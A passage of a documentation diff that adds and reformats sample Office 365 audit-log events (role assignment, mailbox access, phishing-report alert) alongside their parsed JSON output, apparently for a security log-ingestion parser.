@@ -212,12 +212,95 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "add_member_to_role.json" + + ```json + + { + "message": "{\"CreationTime\": \"2024-07-10T14:25:49\", \"Id\": \"b4f48141-a2fe-4d47-9f0d-f09f26307035\", \"Operation\": \"Add member to role.\", \"OrganizationId\": \"f35698e3-5049-4b7f-b26b-9e9784705086\", \"RecordType\": 8, \"ResultStatus\": \"Success\", \"UserKey\": \"key@example.com\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"AzureActiveDirectory\", \"ObjectId\": \"john.doe@example.com\", \"UserId\": \"admin@example.com\", \"AzureActiveDirectoryEventType\": 1, \"ExtendedProperties\": [{\"Name\": \"additionalDetails\", \"Value\": \"{}\"}, {\"Name\": \"extendedAuditEventCategory\", \"Value\": \"Role\"}], \"ModifiedProperties\": [{\"Name\": \"Role.ObjectID\", \"NewValue\": \"54fc7176-29ef-4b41-808f-3cdeb8010649\", \"OldValue\": \"\"}, {\"Name\": \"Role.DisplayName\", \"NewValue\": \"Global Administrator\", \"OldValue\": \"\"}, {\"Name\": \"Role.TemplateId\", \"NewValue\": \"ad1cbca4-efcc-4149-b4a2-aeb40412fe48\", \"OldValue\": \"\"}, {\"Name\": \"Role.WellKnownObjectName\", \"NewValue\": \"TenantAdmins\", \"OldValue\": \"\"}], \"Actor\": [{\"ID\": \"admin@example.com\", \"Type\": 5}, {\"ID\": \"100320029D963D0D\", \"Type\": 3}, {\"ID\": \"User_576409b5-84f3-4791-8e3c-c9677e3bd898\", \"Type\": 2}, {\"ID\": \"576409b5-84f3-4791-8e3c-c9677e3bd898\", \"Type\": 2}, {\"ID\": \"User\", \"Type\": 2}], \"ActorContextId\": \"f35698e3-5049-4b7f-b26b-9e9784705086\", \"InterSystemsId\": \"5a0910e4-c125-4b46-9616-0232d14915dc\", \"IntraSystemId\": \"fb6cd132-f8e8-4ec5-9a0b-4ec8397e1405\", \"SupportTicketId\": \"\", \"Target\": [{\"ID\": \"User_46522b15-1bf5-4bed-8a6c-4edc58c05b23\", \"Type\": 2}, {\"ID\": \"46522b15-1bf5-4bed-8a6c-4edc58c05b23\", \"Type\": 2}, {\"ID\": \"User\", \"Type\": 2}, {\"ID\": \"john.doe@example.com\", \"Type\": 5}, {\"ID\": \"100320029D9D1C86\", \"Type\": 3}], \"TargetContextId\": 
\"f35698e3-5049-4b7f-b26b-9e9784705086\"}", + "event": { + "action": "Add member to role.", + "category": [ + "iam" + ], + "code": "8", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-10T14:25:49Z", + "action": { + "id": 8, + "name": "Add member to role.", + "outcome": "success", + "target": "user" + }, + "office365": { + "audit": { + "object_id": "john.doe@example.com" + }, + "context": { + "correlation": { + "id": "5a0910e4-c125-4b46-9616-0232d14915dc" + }, + "modified_properties": [ + { + "Name": "Role.ObjectID", + "NewValue": "54fc7176-29ef-4b41-808f-3cdeb8010649", + "OldValue": "" + }, + { + "Name": "Role.DisplayName", + "NewValue": "Global Administrator", + "OldValue": "" + }, + { + "Name": "Role.TemplateId", + "NewValue": "ad1cbca4-efcc-4149-b4a2-aeb40412fe48", + "OldValue": "" + }, + { + "Name": "Role.WellKnownObjectName", + "NewValue": "TenantAdmins", + "OldValue": "" + } + ] + }, + "record_type": 8, + "result_status": "Success", + "user_type": { + "code": 0, + "name": "Regular" + } + }, + "organization": { + "id": "f35698e3-5049-4b7f-b26b-9e9784705086" + }, + "related": { + "user": [ + "admin@example.com" + ] + }, + "service": { + "name": "AzureActiveDirectory" + }, + "user": { + "email": "admin@example.com", + "id": "key@example.com", + "name": "admin@example.com" + } + } + + ``` + + === "automated_investigation_and_response.json" ```json { - "message": "{\"CreationTime\": \"2023-04-17T14:27:09\", \"Id\": \"60eaf0aa-edc3-4f8d-8275-bc82d9500e59\", \"Operation\": \"AirInvestigationData\", \"OrganizationId\": \"774d3f25-d4cf-4544-811f-fdb0e60e9ffd\", \"RecordType\": 64, \"UserKey\": \"AirInvestigation\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"AirInvestigation\", \"ObjectId\": \"60eaf0aa-edc3-4f8d-8275-bc82d9500e59\", \"UserId\": \"AirInvestigation\", \"DeepLinkUrl\": \"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:a10a976\", \"EndTimeUtc\": \"2023-04-17T14:27:07\", \"InvestigationId\": 
\"urn:ZappedUrlInvestigation:a10a976d-6e3e-4d10-be50-4907183b6f86\", \"InvestigationName\": \"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a1\", \"InvestigationType\": \"ZappedUrlInvestigation\", \"LastUpdateTimeUtc\": \"2023-04-17T14:21:59\", \"RunningTime\": 931, \"StartTimeUtc\": \"2023-04-17T14:11:38\", \"Status\": \"Remediated\", \"Data\": \"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"OATP\\\",\\\"AlertType\\\":\\\"alert_type_value\\\",\\\"Status\\\":\\\"status_value\\\",\\\"Severity\\\":\\\"severity_value\\\",\\\"IsIncident\\\":true,\\\"CorrelationKey\\\":\\\"correlation_key_value\\\",\\\"Category\\\":\\\"category_value\\\",\\\"SourceAlertType\\\":\\\"source_alert_type_value\\\",\\\"MachineName\\\":\\\"machine_name_value\\\"}\", \"Actions\": [ \"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:8ad9417586e14790ba2afed0a7840e65\\\"}\"]}", + "message": "{\"CreationTime\": \"2023-04-17T14:27:09\", \"Id\": \"60eaf0aa-edc3-4f8d-8275-bc82d9500e59\", \"Operation\": \"AirInvestigationData\", \"OrganizationId\": \"774d3f25-d4cf-4544-811f-fdb0e60e9ffd\", \"RecordType\": 64, \"UserKey\": \"AirInvestigation\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"AirInvestigation\", \"ObjectId\": \"60eaf0aa-edc3-4f8d-8275-bc82d9500e59\", \"UserId\": \"AirInvestigation\", \"DeepLinkUrl\": \"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:a10a976\", \"EndTimeUtc\": \"2023-04-17T14:27:07\", \"InvestigationId\": \"urn:ZappedUrlInvestigation:a10a976d-6e3e-4d10-be50-4907183b6f86\", \"InvestigationName\": \"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a1\", \"InvestigationType\": \"ZappedUrlInvestigation\", \"LastUpdateTimeUtc\": \"2023-04-17T14:21:59\", \"RunningTime\": 931, \"StartTimeUtc\": \"2023-04-17T14:11:38\", \"Status\": \"Remediated\", \"Data\": 
\"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"OATP\\\",\\\"AlertType\\\":\\\"alert_type_value\\\",\\\"Status\\\":\\\"status_value\\\",\\\"Severity\\\":\\\"severity_value\\\",\\\"IsIncident\\\":true,\\\"CorrelationKey\\\":\\\"correlation_key_value\\\",\\\"Category\\\":\\\"category_value\\\",\\\"SourceAlertType\\\":\\\"source_alert_type_value\\\",\\\"MachineName\\\":\\\"machine_name_value\\\"}\", \"Actions\": [\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:8ad9417586e14790ba2afed0a7840e65\\\"}\"]}", "event": { "action": "AirInvestigationData", "code": "64", 
@@ -292,7 +375,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\": \"2023-04-17T14:27:09\", \"Id\": \"60eaf0aa-edc3-4f8d-8275-bc82d9500e59\", \"Operation\": \"AirInvestigationData\", \"OrganizationId\": \"774d3f25-d4cf-4544-811f-fdb0e60e9ffd\", \"RecordType\": 64, \"UserKey\": \"AirInvestigation\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"AirInvestigation\", \"ObjectId\": \"60eaf0aa-edc3-4f8d-8275-bc82d9500e59\", \"UserId\": \"AirInvestigation\", \"DeepLinkUrl\": \"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:a10a976\", \"EndTimeUtc\": \"2023-04-17T14:27:07\", \"InvestigationId\": \"urn:ZappedUrlInvestigation:a10a976d-6e3e-4d10-be50-4907183b6f86\", \"InvestigationName\": \"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a1\", \"InvestigationType\": \"ZappedUrlInvestigation\", \"LastUpdateTimeUtc\": \"2023-04-17T14:21:59\", \"RunningTime\": 931, \"StartTimeUtc\": \"2023-04-17T14:11:38\", \"Status\": \"Remediated\", \"Data\": \"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"OATP\\\",\\\"AlertType\\\":\\\"alert_type_value\\\",\\\"Status\\\":\\\"status_value\\\",\\\"Severity\\\":\\\"severity_value\\\",\\\"IsIncident\\\":true,\\\"CorrelationKey\\\":\\\"correlation_key_value\\\",\\\"Category\\\":\\\"category_value\\\",\\\"SourceAlertType\\\":\\\"source_alert_type_value\\\",\\\"MachineName\\\":\\\"machine_name_value\\\",\\\"Entities\\\": 
[{\\\"Urls\\\":[\\\"http://1.2.3.4\\\",\\\"http://1.2.3.5\\\"],\\\"SenderIP\\\":\\\"1.2.3.4\\\",\\\"Subject\\\":\\\"subject_value\\\",\\\"P1SenderDomain\\\":\\\"http://1.2.3.4\\\",\\\"Threats\\\":1,\\\"Sender\\\":\\\"test@test.test\\\",\\\"Recipient\\\":\\\"test1@test.test\\\"},{\\\"Urls\\\":[\\\"http://1.2.3.6\\\",\\\"http://1.2.3.7\\\"],\\\"SenderIP\\\":\\\"1.2.3.8\\\",\\\"Subject\\\":\\\"subject_value_1\\\",\\\"P1SenderDomain\\\":\\\"http://1.2.3.9\\\",\\\"Threats\\\":2,\\\"Sender\\\":\\\"test3@test.test\\\",\\\"Recipient\\\":\\\"test4@test.test\\\"}]}\", \"Actions\": [ \"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:8ad9417586e14790ba2afed0a7840e65\\\"}\"]}", + "message": "{\"CreationTime\": \"2023-04-17T14:27:09\", \"Id\": \"60eaf0aa-edc3-4f8d-8275-bc82d9500e59\", \"Operation\": \"AirInvestigationData\", \"OrganizationId\": \"774d3f25-d4cf-4544-811f-fdb0e60e9ffd\", \"RecordType\": 64, \"UserKey\": \"AirInvestigation\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"AirInvestigation\", \"ObjectId\": \"60eaf0aa-edc3-4f8d-8275-bc82d9500e59\", \"UserId\": \"AirInvestigation\", \"DeepLinkUrl\": \"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:a10a976\", \"EndTimeUtc\": \"2023-04-17T14:27:07\", \"InvestigationId\": \"urn:ZappedUrlInvestigation:a10a976d-6e3e-4d10-be50-4907183b6f86\", \"InvestigationName\": \"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a1\", \"InvestigationType\": \"ZappedUrlInvestigation\", \"LastUpdateTimeUtc\": \"2023-04-17T14:21:59\", \"RunningTime\": 931, \"StartTimeUtc\": \"2023-04-17T14:11:38\", \"Status\": \"Remediated\", \"Data\": 
\"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"OATP\\\",\\\"AlertType\\\":\\\"alert_type_value\\\",\\\"Status\\\":\\\"status_value\\\",\\\"Severity\\\":\\\"severity_value\\\",\\\"IsIncident\\\":true,\\\"CorrelationKey\\\":\\\"correlation_key_value\\\",\\\"Category\\\":\\\"category_value\\\",\\\"SourceAlertType\\\":\\\"source_alert_type_value\\\",\\\"MachineName\\\":\\\"machine_name_value\\\",\\\"Entities\\\": [{\\\"Urls\\\":[\\\"http://1.2.3.4\\\",\\\"http://1.2.3.5\\\"],\\\"SenderIP\\\":\\\"1.2.3.4\\\",\\\"Subject\\\":\\\"subject_value\\\",\\\"P1SenderDomain\\\":\\\"http://1.2.3.4\\\",\\\"Threats\\\":1,\\\"Sender\\\":\\\"test@test.test\\\",\\\"Recipient\\\":\\\"test1@test.test\\\"},{\\\"Urls\\\":[\\\"http://1.2.3.6\\\",\\\"http://1.2.3.7\\\"],\\\"SenderIP\\\":\\\"1.2.3.8\\\",\\\"Subject\\\":\\\"subject_value_1\\\",\\\"P1SenderDomain\\\":\\\"http://1.2.3.9\\\",\\\"Threats\\\":2,\\\"Sender\\\":\\\"test3@test.test\\\",\\\"Recipient\\\":\\\"test4@test.test\\\"}]}\", \"Actions\": [\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:8ad9417586e14790ba2afed0a7840e65\\\"}\"]}", "event": { "action": "AirInvestigationData", "code": "64", 
@@ -525,7 +608,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"AppAccessContext\":{\"AADSessionId\":\"xxxxxxx\",\"CorrelationId\":\"xxxxxxx\",\"UniqueTokenId\":\"xxxxxxx\"},\"CreationTime\":\"2023-12-13T10:08:25\",\"Id\":\"xxxxxxx\",\"Operation\":\"ListViewed\",\"OrganizationId\":\"xxxxxxx\",\"RecordType\":36,\"UserKey\":\"i:0h.f|membership|xxxxxxx@test.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"SharePoint\",\"ClientIP\":\"0.0.0.0\",\"UserId\":\"user@test.io\",\"AuthenticationType\":\"FormsCookieAuth\",\"BrowserName\":\"Chrome\",\"BrowserVersion\":\"102.0.5005.197\",\"CorrelationId\":\"xxxxxxx\",\"EventSource\":\"SharePoint\",\"IsManagedDevice\":false,\"ItemType\":\"List\",\"ListId\":\"xxxxxx\",\"Platform\":\"WinDesktop\",\"Site\":\"xxxxxx\",\"UserAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Teams/1.6.00.29964 Chrome/102.0.5005.197 Electron/19.1.8 Safari/537.36\",\"WebId\":\"xxxxxx\",\"DeviceDisplayName\":\"xxxxxx\",\"CustomizedDoclib\":false,\"FromApp\":true,\"ItemCount\":102,\"ListBaseTemplateType\":\"101\",\"ListBaseType\":\"DocumentLibrary\",\"ListColor\":\"\",\"ListIcon\":\"\",\"Source\":\"Unknown\",\"TemplateTypeId\":\"\",\"ListTitle\":\"xxxxxx\",\"ObjectId\":\"https://domain.com/subdomain/xxxxxx\"}", + "message": "{\"AppAccessContext\": {\"AADSessionId\": \"xxxxxxx\", \"CorrelationId\": \"xxxxxxx\", \"UniqueTokenId\": \"xxxxxxx\"}, \"CreationTime\": \"2023-12-13T10:08:25\", \"Id\": \"xxxxxxx\", \"Operation\": \"ListViewed\", \"OrganizationId\": \"xxxxxxx\", \"RecordType\": 36, \"UserKey\": \"i:0h.f|membership|xxxxxxx@test.com\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"SharePoint\", \"ClientIP\": \"0.0.0.0\", \"UserId\": \"user@test.io\", \"AuthenticationType\": \"FormsCookieAuth\", \"BrowserName\": \"Chrome\", \"BrowserVersion\": \"102.0.5005.197\", \"CorrelationId\": \"xxxxxxx\", \"EventSource\": \"SharePoint\", \"IsManagedDevice\": 
false, \"ItemType\": \"List\", \"ListId\": \"xxxxxx\", \"Platform\": \"WinDesktop\", \"Site\": \"xxxxxx\", \"UserAgent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Teams/1.6.00.29964 Chrome/102.0.5005.197 Electron/19.1.8 Safari/537.36\", \"WebId\": \"xxxxxx\", \"DeviceDisplayName\": \"xxxxxx\", \"CustomizedDoclib\": false, \"FromApp\": true, \"ItemCount\": 102, \"ListBaseTemplateType\": \"101\", \"ListBaseType\": \"DocumentLibrary\", \"ListColor\": \"\", \"ListIcon\": \"\", \"Source\": \"Unknown\", \"TemplateTypeId\": \"\", \"ListTitle\": \"xxxxxx\", \"ObjectId\": \"https://domain.com/subdomain/xxxxxx\"}", "event": { "action": "ListViewed", "code": "36", 
@@ -586,12 +669,66 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "clientipadress.json" + + ```json + + { + "message": "{\"CreationTime\": \"2024-06-26T06:29:14\", \"Id\": \"xxxx-xxx-xxx-xxxx\", \"Operation\": \"MailItemsAccessed\", \"OrganizationId\": \"xxxx-xxx-xxx-xxxx\", \"RecordType\": 50, \"ResultStatus\": \"Succeeded\", \"UserKey\": \"xxxx-xxx-xxx-xxxx\", \"UserType\": 5, \"Version\": 1, \"Workload\": \"Exchange\", \"UserId\": \"user@mail.fr\", \"AppId\": \"xxxx-xxx-xxx-xxxx\", \"ClientAppId\": \"clientappidxxxx-xxx-xxx-xxxx\", \"ClientIPAddress\": \"1000:1000:100:007::1\", \"ClientInfoString\": \"Client=Exemple1;Client=Exemple2;;\", \"ExternalAccess\": \"False\", \"InternalLogonType\": 0, \"LogonType\": 0, \"LogonUserSid\": \"S-1-5-21-xxxx-xxx-xxx-xxxx\", \"MailboxGuid\": \"xxxx-xxx-xxx-xxxx\", \"MailboxOwnerSid\": \"S-1-5-21-xxxx-xxx-xxx-xxxx\", \"MailboxOwnerUPN\": \"user@mail.fr\", \"OperationProperties\": [{\"Name\": \"MailAccessType\", \"Value\": \"Bind\"}, {\"Name\": \"IsThrottled\", \"Value\": \"False\"}], \"OrganizationName\": \"organization.microsoft.com\", \"OriginatingServer\": \"server (0.0.0000.000)\\r\\n\", \"Folders\": [{\"FolderItems\": [{\"ClientRequestId\": \"xxxx-xxx-xxx-xxxx\", \"Id\": \"aaaaaaaaaaaaa\", \"InternetMessageId\": \"xxxxx@exemple.com\", \"SizeInBytes\": 127625}, {\"ClientRequestId\": \"xxxx-xxx-xxx-xxxx\", \"Id\": \"aaaaaaaaaaaaaaaaaa\", \"InternetMessageId\": \"xxxx-xxx-xxx-xxxx@enterprise.net\", \"SizeInBytes\": 147360}], \"Id\": \"aaaaaaaaaaaaaaaaaaaa\", \"Path\": \"Boite de reception\"}], \"OperationCount\": 2}", + "event": { + "action": "MailItemsAccessed", + "code": "50", + "outcome": "success" + }, + "@timestamp": "2024-06-26T06:29:14Z", + "action": { + "id": 50, + "name": "MailItemsAccessed", + "outcome": "success", + "target": "user" + }, + "office365": { + "record_type": 50, + "result_status": "Succeeded", + "user_type": { + "code": 5, + "name": "Application" + } + }, + 
"organization": { + "id": "xxxx-xxx-xxx-xxxx" + }, + "related": { + "ip": [ + "1000:1000:100:7::1" + ], + "user": [ + "user@mail.fr" + ] + }, + "service": { + "name": "Exchange" + }, + "source": { + "address": "1000:1000:100:7::1", + "ip": "1000:1000:100:7::1" + }, + "user": { + "email": "user@mail.fr", + "id": "xxxx-xxx-xxx-xxxx", + "name": "user@mail.fr" + } + } + + ``` + + === "compliancemanager-scorechange.json" ```json { - "message": "{\"ActionId\":\"a81edede-be03-41f4-aae2-b6b25186adc6\",\"ActionName\":\"Enable self-service password reset\",\"ActionProducts\":[],\"ActionScore\":26.0,\"ActionScoreChange\":-1.0,\"ActionActivity\":\"COMPLIANCEMANAGER-SCORECHANGE\",\"Assessments\":[],\"Templates\":[],\"Solutions\":[],\"ManagedBy\":\"User\",\"ActionScope\":\"Tenant\",\"UserId\":\"\",\"Id\":\"aa9367e4-9fa3-4709-8326-b35c04f784d2\",\"RecordType\":155,\"CreationTime\":\"2022-10-05T10:12:57\",\"Operation\":\"COMPLIANCEMANAGER-SCORECHANGE\",\"OrganizationId\":\"163381f4-6b9c-43c2-8b57-bfc16b7354f2\",\"UserType\":2,\"UserKey\":\"Organization\",\"Workload\":\"ComplianceManager\",\"ResultStatus\":\"Successful\",\"Version\":1}", + "message": "{\"ActionId\": \"a81edede-be03-41f4-aae2-b6b25186adc6\", \"ActionName\": \"Enable self-service password reset\", \"ActionProducts\": [], \"ActionScore\": 26.0, \"ActionScoreChange\": -1.0, \"ActionActivity\": \"COMPLIANCEMANAGER-SCORECHANGE\", \"Assessments\": [], \"Templates\": [], \"Solutions\": [], \"ManagedBy\": \"User\", \"ActionScope\": \"Tenant\", \"UserId\": \"\", \"Id\": \"aa9367e4-9fa3-4709-8326-b35c04f784d2\", \"RecordType\": 155, \"CreationTime\": \"2022-10-05T10:12:57\", \"Operation\": \"COMPLIANCEMANAGER-SCORECHANGE\", \"OrganizationId\": \"163381f4-6b9c-43c2-8b57-bfc16b7354f2\", \"UserType\": 2, \"UserKey\": \"Organization\", \"Workload\": \"ComplianceManager\", \"ResultStatus\": \"Successful\", \"Version\": 1}", "event": { "action": "COMPLIANCEMANAGER-SCORECHANGE", "code": "155", 
@@ -627,12 +764,81 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "email_reported.json" + + ```json + + { + "message": "{\"CreationTime\": \"2024-05-24T06:29:22\", \"Id\": \"03604c8d-ed69-466b-a9f4-80467c958739\", \"Operation\": \"AlertUpdated\", \"OrganizationId\": \"4f962933-707f-4441-8d56-bb178a2ed0b9\", \"RecordType\": 40, \"ResultStatus\": \"Succeeded\", \"UserKey\": \"SecurityComplianceAlerts\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"SecurityComplianceCenter\", \"ObjectId\": \"f54a9b97-a432-471b-a84a-ddcba13f5f35\", \"UserId\": \"SecurityComplianceAlerts\", \"AlertId\": \"2c7f6c46-33d7-4101-b2fc-0af27eaf308a\", \"AlertLinks\": [], \"AlertType\": \"System\", \"Category\": \"ThreatManagement\", \"Comments\": \"New alert\", \"Data\": \"{\\\"f3u\\\":\\\"john.doe@example.com\\\",\\\"ts\\\":\\\"2024-05-24T05:44:00Z\\\",\\\"te\\\":\\\"2024-05-24T05:45:00Z\\\",\\\"op\\\":\\\"UserSubmission\\\",\\\"wl\\\":\\\"SecurityComplianceCenter\\\",\\\"tid\\\":\\\"8a1a1157-0272-492d-ab10-3f9853ac8183\\\",\\\"tdc\\\":\\\"1\\\",\\\"reid\\\":\\\"a04c1571-7271-445e-82e3-c39f848aceb8\\\",\\\"wsrt\\\":\\\"2024-05-24T05:45:22\\\",\\\"mdt\\\":\\\"Audit\\\",\\\"rid\\\":\\\"9a36861c-cc4d-4818-be4a-a20555480a00\\\",\\\"cid\\\":\\\"2b6fda52-8386-4213-b6fb-2fcb078571c4\\\",\\\"ad\\\":\\\"This alert is triggered when any email message is reported as malware or phish by users -V1.0.0.3\\\",\\\"lon\\\":\\\"UserSubmission\\\",\\\"an\\\":\\\"Email reported by user as malware or phish\\\",\\\"sev\\\":\\\"Low\\\",\\\"ail\\\":\\\"https://security.microsoft.com/mtp-investigation/urn:SubmissionInvestigation:260a29b9cf8a4358857b82aa9f086c48\\\"}\", \"Name\": \"Email reported by user as malware or phish\", \"PolicyId\": \"5b31bd58-7d6e-4f97-aa6b-5135fb1b1e52\", \"Severity\": \"Low\", \"Source\": \"Office 365 Security & Compliance\", \"Status\": \"Resolved\"}", + "event": { + "action": "AlertUpdated", + "category": [ + "intrusion_detection" + ], + 
"code": "40", + "kind": "alert", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-05-24T06:29:22Z", + "action": { + "id": 40, + "name": "AlertUpdated", + "outcome": "success", + "target": "user" + }, + "office365": { + "alert": { + "category": "ThreatManagement", + "display_name": "Email reported by user as malware or phish", + "id": "2c7f6c46-33d7-4101-b2fc-0af27eaf308a", + "severity": "Low", + "source": "Office 365 Security & Compliance", + "status": "Resolved" + }, + "audit": { + "object_id": "f54a9b97-a432-471b-a84a-ddcba13f5f35" + }, + "record_type": 40, + "result_status": "Succeeded", + "user_type": { + "code": 4, + "name": "System" + } + }, + "organization": { + "id": "4f962933-707f-4441-8d56-bb178a2ed0b9" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "rule": { + "id": "5b31bd58-7d6e-4f97-aa6b-5135fb1b1e52" + }, + "service": { + "name": "SecurityComplianceCenter" + }, + "user": { + "domain": "example.com", + "email": "john.doe@example.com", + "id": "SecurityComplianceAlerts", + "name": "john.doe" + } + } + + ``` + + === "exchange_event1.json" ```json { - "message": 
"{\"CreationTime\":\"2022-04-05T20:35:01\",\"Id\":\"5615b32d-4c18-4ada-cc88-08da1743c258\",\"Operation\":\"Create\",\"OrganizationId\":\"7f7e5b97-b780-473c-9c76-9182a9d7f2b4\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"10033FFF80D15ECF\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"d498:796:298e:be16:1b11:29eb:9996:8a36\",\"UserId\":\"email@example.org\",\"AppId\":\"27922004-5251-4030-b22d-91ecd9a37ea4\",\"ClientIPAddress\":\"d498:796:298e:be16:1b11:29eb:9996:8a36\",\"ClientInfoString\":\"Client=OutlookService;Outlook-iOS/2.0;\",\"ClientRequestId\":\"1725\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-5-21-3620271904-3241272990-2175486473-1085344\",\"MailboxGuid\":\"24683bc8-fab1-48b3-b834-cb11b95bb911\",\"MailboxOwnerSid\":\"S-1-5-21-3620271904-3241272990-2175486473-1085344\",\"MailboxOwnerUPN\":\"email@example.org\",\"OrganizationName\":\"xxxx.onmicrosoft.com\",\"OriginatingServer\":\"PR3PR03MB6601 (15.20.4200.000)\\r\\n\",\"SessionId\":\"8ad3822b-1cfd-40e7-aeaa-6d0708691ad8\",\"Item\":{\"Id\":\"LgAAAAAdhAMRqmYRzZvIAKoAL8RaDQCB1ldAzYsRRItL+noffZbOAATJxTeHAAAJ\",\"InternetMessageId\":\"\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAAAbOnSFmOkITaMliEZRj+Z3AQAPzmaC0nx3Qo/JWqclreA/AAAEUskDAAAB\",\"Path\":\"\\\\Drafts1\"},\"SizeInBytes\":34785,\"Subject\":\"Email subject\"}}", + "message": "{\"CreationTime\": \"2022-04-05T20:35:01\", \"Id\": \"5615b32d-4c18-4ada-cc88-08da1743c258\", \"Operation\": \"Create\", \"OrganizationId\": \"7f7e5b97-b780-473c-9c76-9182a9d7f2b4\", \"RecordType\": 2, \"ResultStatus\": \"Succeeded\", \"UserKey\": \"10033FFF80D15ECF\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"Exchange\", \"ClientIP\": \"d498:796:298e:be16:1b11:29eb:9996:8a36\", \"UserId\": \"email@example.org\", \"AppId\": \"27922004-5251-4030-b22d-91ecd9a37ea4\", \"ClientIPAddress\": \"d498:796:298e:be16:1b11:29eb:9996:8a36\", \"ClientInfoString\": 
\"Client=OutlookService;Outlook-iOS/2.0;\", \"ClientRequestId\": \"1725\", \"ExternalAccess\": false, \"InternalLogonType\": 0, \"LogonType\": 0, \"LogonUserSid\": \"S-1-5-21-3620271904-3241272990-2175486473-1085344\", \"MailboxGuid\": \"24683bc8-fab1-48b3-b834-cb11b95bb911\", \"MailboxOwnerSid\": \"S-1-5-21-3620271904-3241272990-2175486473-1085344\", \"MailboxOwnerUPN\": \"email@example.org\", \"OrganizationName\": \"xxxx.onmicrosoft.com\", \"OriginatingServer\": \"PR3PR03MB6601 (15.20.4200.000)\\r\\n\", \"SessionId\": \"8ad3822b-1cfd-40e7-aeaa-6d0708691ad8\", \"Item\": {\"Id\": \"LgAAAAAdhAMRqmYRzZvIAKoAL8RaDQCB1ldAzYsRRItL+noffZbOAATJxTeHAAAJ\", \"InternetMessageId\": \"\", \"IsRecord\": false, \"ParentFolder\": {\"Id\": \"LgAAAAAbOnSFmOkITaMliEZRj+Z3AQAPzmaC0nx3Qo/JWqclreA/AAAEUskDAAAB\", \"Path\": \"\\\\Drafts1\"}, \"SizeInBytes\": 34785, \"Subject\": \"Email subject\"}}", "event": { "action": "Create", "category": [ 
@@ -704,7 +910,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2023-09-15T18:16:53\",\"Id\":\"461a38ce-fc36-4a4d-b73e-643262cc063f\",\"Operation\":\"MailItemsAccessed\",\"OrganizationId\":\"80494e66-e53a-48eb-8e52-c6ba3b1ddd2c\",\"RecordType\":50,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"100320029D9C5179\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"UserId\":\"NestorW@example.onmicrosoft.com\",\"AppId\":\"00000002-0000-0ff1-ce00-000000000000\",\"ClientIPAddress\":\"2a01:e0a:4ed:f6d0:49b6:317d:859f:edd7\",\"ClientInfoString\":\"Client=OWA;Action=ViaProxy\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-5-21-2647618131-1242773297-2752983135-27922907\",\"MailboxGuid\":\"03d9e949-cbc1-4dd2-b7ba-8a1d1e0207b5\",\"MailboxOwnerSid\":\"S-1-5-21-2647618131-1242773297-2752983135-27922907\",\"MailboxOwnerUPN\":\"NestorW@example.onmicrosoft.com\",\"OperationProperties\":[{\"Name\":\"MailAccessType\",\"Value\":\"Bind\"},{\"Name\":\"IsThrottled\",\"Value\":\"False\"}],\"OrganizationName\":\"example.onmicrosoft.com\",\"OriginatingServer\":\"AM0PR07MB5763 